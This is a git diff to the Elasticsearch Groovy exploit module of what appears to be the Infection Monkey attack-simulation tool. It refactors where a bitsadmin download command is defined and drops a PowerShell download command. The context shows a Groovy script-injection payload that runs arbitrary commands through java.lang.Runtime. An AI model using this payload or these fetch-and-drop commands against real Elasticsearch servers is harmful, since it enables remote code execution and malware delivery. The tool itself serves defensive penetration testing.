diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 74be84a79..c4cc3e4a7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -8,7 +8,7 @@ import json import logging import requests from exploit.web_rce import WebRCE -from model import WGET_HTTP_UPLOAD +from model import WGET_HTTP_UPLOAD, RDP_CMDLINE_HTTP from network.elasticfinger import ES_PORT, ES_SERVICE import re @@ -25,11 +25,6 @@ class ElasticGroovyExploiter(WebRCE): JAVA_CMD = GENERIC_QUERY \ % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" - # Both commands are prepared for use in future development - RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ - r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" - _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): @@ -39,7 +34,7 @@ class ElasticGroovyExploiter(WebRCE): exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() exploit_config['dropper'] = True exploit_config['url_extensions'] = ['_search?pretty'] - exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': RDP_CMDLINE_HTTP} return exploit_config def get_open_service_ports(self, port_list, names):